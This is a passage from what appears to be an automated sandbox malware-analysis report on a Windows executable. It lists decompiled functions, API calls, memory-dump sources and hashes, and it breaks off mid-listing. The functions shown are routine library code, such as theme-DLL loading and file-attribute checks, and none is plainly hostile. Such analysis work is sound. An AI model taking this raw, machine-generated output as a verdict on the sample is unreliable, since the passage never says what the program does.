                                                                                                                                                                                                                            0x0045d307
                                                                                                                                                                                                                            0x0045d310

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?,?,0045F1FB,00000000,0045F21D,?,00000000,0045F23F,?,?,?,?,00000000), ref: 0045D307
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FolderLocationSpecial
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3328827890-0
                                                                                                                                                                                                                            • Opcode ID: a22953724ced97bec980e9ad6ab0f70e644ba08d145622cf2bd1aee856a51c4c
                                                                                                                                                                                                                            • Instruction ID: ef8edf6798076d0a212359ae3af47a46da83506bc8f37cce848a45b11e0c3a11
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a22953724ced97bec980e9ad6ab0f70e644ba08d145622cf2bd1aee856a51c4c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 02C09BB13150045AD204AB49FD47F97335CD754345F500519F4D4CA154D354A9005EA6
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00409A7C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00409A7C(void* __eax) {
				long _t4;

				_t4 = GetFileAttributesA(E00404E80(__eax)); // executed
				return _t4;
			}




                                                                                                                                                                                                                            0x00409a87
                                                                                                                                                                                                                            0x00409a8d

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000,?,00474B38,00000000,00474BFF), ref: 00409A87
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                                                                            • Opcode ID: 6677f4aef908889f950cb6c6c2e2ae9e969a36d7372979f133039ded665ad625
                                                                                                                                                                                                                            • Instruction ID: 67a43f86abe4dd1ef5a5c4911a27f769ef87cc39f57c29bfc39dbdecf4d4660c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6677f4aef908889f950cb6c6c2e2ae9e969a36d7372979f133039ded665ad625
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 58A011C0B0020022CA0032FA2CC2A0A00CC2B882283800A3EB208E2283E83CA808002C
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00435634 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00435634(void* __eax) {
				int _t3;

				 *((char*)(__eax + 0x10)) = 3;
				_t3 = WinHelpA(0, 0x43564c, 2, 0); // executed
				return _t3;
			}




                                                                                                                                                                                                                            0x00435634
                                                                                                                                                                                                                            0x00435643
                                                                                                                                                                                                                            0x00435648

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Help
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2830496658-0
                                                                                                                                                                                                                            • Opcode ID: b7d492b384d7ba0511589629e0b64df45981746ae1b7cfa55a9054cb4cff1418
                                                                                                                                                                                                                            • Instruction ID: 79a91a3f31a143df2f0efbcac983927cafc7536058e87a69d5408432099ce831
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b7d492b384d7ba0511589629e0b64df45981746ae1b7cfa55a9054cb4cff1418
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F8B011C0BC8380BAFA2222288C0BF080C002B00F08FE000CAB2083C0C302ECA200002E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00422BCC Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00422BCC(intOrPtr _a4, intOrPtr _a8) {
				void* _t14;
				intOrPtr _t25;
				char* _t26;
				void* _t35;

				if( *0x49e88c == 0) {
					_t14 = VirtualAlloc(0, 0x1000, 0x1000, 0x40); // executed
					_t35 = _t14;
					 *_t35 =  *0x49e888;
					_t1 = _t35 + 4; // 0x4
					E004029DC(0x49b5c8, 2, _t1);
					_t2 = _t35 + 5; // 0x5
					 *((intOrPtr*)(_t35 + 6)) = E00422BC4(_t2, E00422BA4);
					_t4 = _t35 + 0xa; // 0xa
					_t26 = _t4;
					do {
						 *_t26 = 0xe8;
						_t5 = _t35 + 4; // 0x4
						 *((intOrPtr*)(_t26 + 1)) = E00422BC4(_t26, _t5);
						 *((intOrPtr*)(_t26 + 5)) =  *0x49e88c;
						 *0x49e88c = _t26;
						_t26 = _t26 + 0xd;
					} while (_t26 - _t35 < 0xffc);
					 *0x49e888 = _t35;
				}
				_t25 =  *0x49e88c;
				 *0x49e88c =  *((intOrPtr*)(_t25 + 5));
				 *((intOrPtr*)(_t25 + 5)) = _a4;
				 *((intOrPtr*)(_t25 + 9)) = _a8;
				return  *0x49e88c;
			}







                                                                                                                                                                                                                            0x00422bda
                                                                                                                                                                                                                            0x00422bea
                                                                                                                                                                                                                            0x00422bef
                                                                                                                                                                                                                            0x00422bf6
                                                                                                                                                                                                                            0x00422bf8
                                                                                                                                                                                                                            0x00422c05
                                                                                                                                                                                                                            0x00422c0f
                                                                                                                                                                                                                            0x00422c17
                                                                                                                                                                                                                            0x00422c1a
                                                                                                                                                                                                                            0x00422c1a
                                                                                                                                                                                                                            0x00422c1d
                                                                                                                                                                                                                            0x00422c1d
                                                                                                                                                                                                                            0x00422c20
                                                                                                                                                                                                                            0x00422c2a
                                                                                                                                                                                                                            0x00422c2f
                                                                                                                                                                                                                            0x00422c32
                                                                                                                                                                                                                            0x00422c34
                                                                                                                                                                                                                            0x00422c3b
                                                                                                                                                                                                                            0x00422c42
                                                                                                                                                                                                                            0x00422c42
                                                                                                                                                                                                                            0x00422c4a
                                                                                                                                                                                                                            0x00422c4f
                                                                                                                                                                                                                            0x00422c54
                                                                                                                                                                                                                            0x00422c5a
                                                                                                                                                                                                                            0x00422c61

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 00422BEA
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                                                                                            • Opcode ID: 8d98de8cba0d3e477e902bc33fe2311dc39987d38296b3e9462c52c096984525
                                                                                                                                                                                                                            • Instruction ID: b178b9f7f537fc2e71311a8aaadf980aeb118d6c29c3e7f0598fc6829f083217
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8d98de8cba0d3e477e902bc33fe2311dc39987d38296b3e9462c52c096984525
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E0116634200315AFC714DF1AD880A42BBE0EF48390F50C53BE9A88B385D3B4E9058BA8
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                            Function 0042E3B4 Relevance: 166.5, APIs: 48, Strings: 47, Instructions: 266libraryloaderCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 90%
                                                                                                                                                                                                                            			E0042E3B4(void* __ebx, void* __ecx) {
				char _v5;
				intOrPtr _t2;
				intOrPtr _t6;
				intOrPtr _t108;
				intOrPtr _t111;

				_t2 =  *0x49ea48; // 0x2210dc8
				E0042E1AC(_t2);
				_push(_t111);
				_push(0x42e767);
				_push( *[fs:eax]);
				 *[fs:eax] = _t111;
				 *0x49ea44 =  *0x49ea44 + 1;
				if( *0x49ea40 == 0) {
					 *0x49ea40 = LoadLibraryA("uxtheme.dll");
					if( *0x49ea40 > 0) {
						 *0x49e980 = GetProcAddress( *0x49ea40, "OpenThemeData");
						 *0x49e984 = GetProcAddress( *0x49ea40, "CloseThemeData");
						 *0x49e988 = GetProcAddress( *0x49ea40, "DrawThemeBackground");
						 *0x49e98c = GetProcAddress( *0x49ea40, "DrawThemeText");
						 *0x49e990 = GetProcAddress( *0x49ea40, "GetThemeBackgroundContentRect");
						 *0x49e994 = GetProcAddress( *0x49ea40, "GetThemeBackgroundContentRect");
						 *0x49e998 = GetProcAddress( *0x49ea40, "GetThemePartSize");
						 *0x49e99c = GetProcAddress( *0x49ea40, "GetThemeTextExtent");
						 *0x49e9a0 = GetProcAddress( *0x49ea40, "GetThemeTextMetrics");
						 *0x49e9a4 = GetProcAddress( *0x49ea40, "GetThemeBackgroundRegion");
						 *0x49e9a8 = GetProcAddress( *0x49ea40, "HitTestThemeBackground");
						 *0x49e9ac = GetProcAddress( *0x49ea40, "DrawThemeEdge");
						 *0x49e9b0 = GetProcAddress( *0x49ea40, "DrawThemeIcon");
						 *0x49e9b4 = GetProcAddress( *0x49ea40, "IsThemePartDefined");
						 *0x49e9b8 = GetProcAddress( *0x49ea40, "IsThemeBackgroundPartiallyTransparent");
						 *0x49e9bc = GetProcAddress( *0x49ea40, "GetThemeColor");
						 *0x49e9c0 = GetProcAddress( *0x49ea40, "GetThemeMetric");
						 *0x49e9c4 = GetProcAddress( *0x49ea40, "GetThemeString");
						 *0x49e9c8 = GetProcAddress( *0x49ea40, "GetThemeBool");
						 *0x49e9cc = GetProcAddress( *0x49ea40, "GetThemeInt");
						 *0x49e9d0 = GetProcAddress( *0x49ea40, "GetThemeEnumValue");
						 *0x49e9d4 = GetProcAddress( *0x49ea40, "GetThemePosition");
						 *0x49e9d8 = GetProcAddress( *0x49ea40, "GetThemeFont");
						 *0x49e9dc = GetProcAddress( *0x49ea40, "GetThemeRect");
						 *0x49e9e0 = GetProcAddress( *0x49ea40, "GetThemeMargins");
						 *0x49e9e4 = GetProcAddress( *0x49ea40, "GetThemeIntList");
						 *0x49e9e8 = GetProcAddress( *0x49ea40, "GetThemePropertyOrigin");
						 *0x49e9ec = GetProcAddress( *0x49ea40, "SetWindowTheme");
						 *0x49e9f0 = GetProcAddress( *0x49ea40, "GetThemeFilename");
						 *0x49e9f4 = GetProcAddress( *0x49ea40, "GetThemeSysColor");
						 *0x49e9f8 = GetProcAddress( *0x49ea40, "GetThemeSysColorBrush");
						 *0x49e9fc = GetProcAddress( *0x49ea40, "GetThemeSysBool");
						 *0x49ea00 = GetProcAddress( *0x49ea40, "GetThemeSysSize");
						 *0x49ea04 = GetProcAddress( *0x49ea40, "GetThemeSysFont");
						 *0x49ea08 = GetProcAddress( *0x49ea40, "GetThemeSysString");
						 *0x49ea0c = GetProcAddress( *0x49ea40, "GetThemeSysInt");
						 *0x49ea10 = GetProcAddress( *0x49ea40, "IsThemeActive");
						 *0x49ea14 = GetProcAddress( *0x49ea40, "IsAppThemed");
						 *0x49ea18 = GetProcAddress( *0x49ea40, "GetWindowTheme");
						 *0x49ea1c = GetProcAddress( *0x49ea40, "EnableThemeDialogTexture");
						 *0x49ea20 = GetProcAddress( *0x49ea40, "IsThemeDialogTextureEnabled");
						 *0x49ea24 = GetProcAddress( *0x49ea40, "GetThemeAppProperties");
						 *0x49ea28 = GetProcAddress( *0x49ea40, "SetThemeAppProperties");
						 *0x49ea2c = GetProcAddress( *0x49ea40, "GetCurrentThemeName");
						 *0x49ea30 = GetProcAddress( *0x49ea40, "GetThemeDocumentationProperty");
						 *0x49ea34 = GetProcAddress( *0x49ea40, "DrawThemeParentBackground");
						 *0x49ea38 = GetProcAddress( *0x49ea40, "EnableTheming");
					}
				}
				_v5 =  *0x49ea40 > 0;
				_pop(_t108);
				 *[fs:eax] = _t108;
				_push(0x42e76e);
				_t6 =  *0x49ea48; // 0x2210dc8
				return E0042E1B4(_t6);
			}








                                                                                                                                                                                                                            0x0042e3be
                                                                                                                                                                                                                            0x0042e3c3
                                                                                                                                                                                                                            0x0042e3ca
                                                                                                                                                                                                                            0x0042e3cb
                                                                                                                                                                                                                            0x0042e3d0
                                                                                                                                                                                                                            0x0042e3d3
                                                                                                                                                                                                                            0x0042e3d6
                                                                                                                                                                                                                            0x0042e3df
                                                                                                                                                                                                                            0x0042e3ef
                                                                                                                                                                                                                            0x0042e3f4
                                                                                                                                                                                                                            0x0042e407
                                                                                                                                                                                                                            0x0042e419
                                                                                                                                                                                                                            0x0042e42b
                                                                                                                                                                                                                            0x0042e43d
                                                                                                                                                                                                                            0x0042e44f
                                                                                                                                                                                                                            0x0042e461
                                                                                                                                                                                                                            0x0042e473
                                                                                                                                                                                                                            0x0042e485
                                                                                                                                                                                                                            0x0042e497
                                                                                                                                                                                                                            0x0042e4a9
                                                                                                                                                                                                                            0x0042e4bb
                                                                                                                                                                                                                            0x0042e4cd
                                                                                                                                                                                                                            0x0042e4df
                                                                                                                                                                                                                            0x0042e4f1
                                                                                                                                                                                                                            0x0042e503
                                                                                                                                                                                                                            0x0042e515
                                                                                                                                                                                                                            0x0042e527
                                                                                                                                                                                                                            0x0042e539
                                                                                                                                                                                                                            0x0042e54b
                                                                                                                                                                                                                            0x0042e55d
                                                                                                                                                                                                                            0x0042e56f
                                                                                                                                                                                                                            0x0042e581
                                                                                                                                                                                                                            0x0042e593
                                                                                                                                                                                                                            0x0042e5a5
                                                                                                                                                                                                                            0x0042e5b7
                                                                                                                                                                                                                            0x0042e5c9
                                                                                                                                                                                                                            0x0042e5db
                                                                                                                                                                                                                            0x0042e5ed
                                                                                                                                                                                                                            0x0042e5ff
                                                                                                                                                                                                                            0x0042e611
                                                                                                                                                                                                                            0x0042e623
                                                                                                                                                                                                                            0x0042e635
                                                                                                                                                                                                                            0x0042e647
                                                                                                                                                                                                                            0x0042e659
                                                                                                                                                                                                                            0x0042e66b
                                                                                                                                                                                                                            0x0042e67d
                                                                                                                                                                                                                            0x0042e68f
                                                                                                                                                                                                                            0x0042e6a1
                                                                                                                                                                                                                            0x0042e6b3
                                                                                                                                                                                                                            0x0042e6c5
                                                                                                                                                                                                                            0x0042e6d7
                                                                                                                                                                                                                            0x0042e6e9
                                                                                                                                                                                                                            0x0042e6fb
                                                                                                                                                                                                                            0x0042e70d
                                                                                                                                                                                                                            0x0042e71f
                                                                                                                                                                                                                            0x0042e731
                                                                                                                                                                                                                            0x0042e743
                                                                                                                                                                                                                            0x0042e743
                                                                                                                                                                                                                            0x0042e3f4
                                                                                                                                                                                                                            0x0042e74b
                                                                                                                                                                                                                            0x0042e751
                                                                                                                                                                                                                            0x0042e754
                                                                                                                                                                                                                            0x0042e757
                                                                                                                                                                                                                            0x0042e75c
                                                                                                                                                                                                                            0x0042e766

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(uxtheme.dll,00000000,0042E767), ref: 0042E3EA
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0042E402
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0042E414
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0042E426
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0042E438
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0042E44A
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0042E45C
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0042E46E
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0042E480
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0042E492
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0042E4A4
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0042E4B6
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0042E4C8
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0042E4DA
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0042E4EC
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0042E4FE
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0042E510
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0042E522
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0042E534
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0042E546
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0042E558
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0042E56A
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0042E57C
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0042E58E
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0042E5A0
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0042E5B2
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0042E5C4
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0042E5D6
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0042E5E8
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0042E5FA
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0042E60C
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0042E61E
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0042E630
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0042E642
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0042E654
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0042E666
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0042E678
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0042E68A
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0042E69C
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0042E6AE
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0042E6C0
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0042E6D2
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0042E6E4
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0042E6F6
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0042E708
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0042E71A
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0042E72C
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0042E73E
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                            • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                                                                                                                                                                            • API String ID: 2238633743-2910565190
                                                                                                                                                                                                                            • Opcode ID: ee8c2f2005abb4408c06f873b3dfebe79f53f1c338d80728f9456e011397e4d0
                                                                                                                                                                                                                            • Instruction ID: 583b1748ec7c75dcc55376f1719c3b0464f23e6b29e7b95583f9f44409200d59
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ee8c2f2005abb4408c06f873b3dfebe79f53f1c338d80728f9456e011397e4d0
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 08A1F2B0F48660AFDB00EB67EC96B2637A8EB15704350467BB400DF696D67DA8009B5E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00406018 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 136stringlibraryfileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 53%
                                                                                                                                                                                                                            			E00406018(char* __eax, intOrPtr __edx) {
				char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				struct _WIN32_FIND_DATAA _v334;
				char _v595;
				void* _t45;
				char* _t54;
				char* _t64;
				void* _t83;
				intOrPtr* _t84;
				char* _t90;
				struct HINSTANCE__* _t91;
				char* _t93;
				void* _t94;
				char* _t95;
				void* _t96;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_t91 = GetModuleHandleA("kernel32.dll");
				if(_t91 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t93 = _v8 + 2;
						goto L10;
					} else {
						if( *((char*)(_v8 + 1)) == 0x5c) {
							_t95 = E00406004(_v8 + 2);
							if( *_t95 != 0) {
								_t14 = _t95 + 1; // 0x1
								_t93 = E00406004(_t14);
								if( *_t93 != 0) {
									L10:
									_t83 = _t93 - _v8;
									_push(_t83 + 1);
									_push(_v8);
									_push( &_v595);
									L0040131C();
									while( *_t93 != 0) {
										_t90 = E00406004(_t93 + 1);
										_t45 = _t90 - _t93;
										if(_t45 + _t83 + 1 <= 0x105) {
											_push(_t45 + 1);
											_push(_t93);
											_push( &(( &_v595)[_t83]));
											L0040131C();
											_t94 = FindFirstFileA( &_v595,  &_v334);
											if(_t94 != 0xffffffff) {
												FindClose(_t94);
												_t54 =  &(_v334.cFileName);
												_push(_t54);
												L00401324();
												if(_t54 + _t83 + 1 + 1 <= 0x105) {
													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
													_push(0x105 - _t83 - 1);
													_push( &(_v334.cFileName));
													_push( &(( &(( &_v595)[_t83]))[1]));
													L0040131C();
													_t64 =  &(_v334.cFileName);
													_push(_t64);
													L00401324();
													_t83 = _t83 + _t64 + 1;
													_t93 = _t90;
													continue;
												}
											}
										}
										goto L17;
									}
									_push(_v12);
									_push( &_v595);
									_push(_v8);
									L0040131C();
								}
							}
						}
					}
				} else {
					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
					if(_t84 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v595);
						_push(_v8);
						if( *_t84() == 0) {
							goto L4;
						} else {
							_push(_v12);
							_push( &_v595);
							_push(_v8);
							L0040131C();
						}
					}
				}
				L17:
				return _v16;
			}



















                                                                                                                                                                                                                            0x00406024
                                                                                                                                                                                                                            0x00406027
                                                                                                                                                                                                                            0x0040602d
                                                                                                                                                                                                                            0x0040603a
                                                                                                                                                                                                                            0x0040603e
                                                                                                                                                                                                                            0x00406080
                                                                                                                                                                                                                            0x00406086
                                                                                                                                                                                                                            0x004060c3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406088
                                                                                                                                                                                                                            0x0040608f
                                                                                                                                                                                                                            0x004060a0
                                                                                                                                                                                                                            0x004060a5
                                                                                                                                                                                                                            0x004060ab
                                                                                                                                                                                                                            0x004060b3
                                                                                                                                                                                                                            0x004060b8
                                                                                                                                                                                                                            0x004060c6
                                                                                                                                                                                                                            0x004060c8
                                                                                                                                                                                                                            0x004060ce
                                                                                                                                                                                                                            0x004060d2
                                                                                                                                                                                                                            0x004060d9
                                                                                                                                                                                                                            0x004060da
                                                                                                                                                                                                                            0x00406185
                                                                                                                                                                                                                            0x004060ec
                                                                                                                                                                                                                            0x004060f0
                                                                                                                                                                                                                            0x004060fd
                                                                                                                                                                                                                            0x00406104
                                                                                                                                                                                                                            0x00406105
                                                                                                                                                                                                                            0x0040610e
                                                                                                                                                                                                                            0x0040610f
                                                                                                                                                                                                                            0x00406127
                                                                                                                                                                                                                            0x0040612c
                                                                                                                                                                                                                            0x0040612f
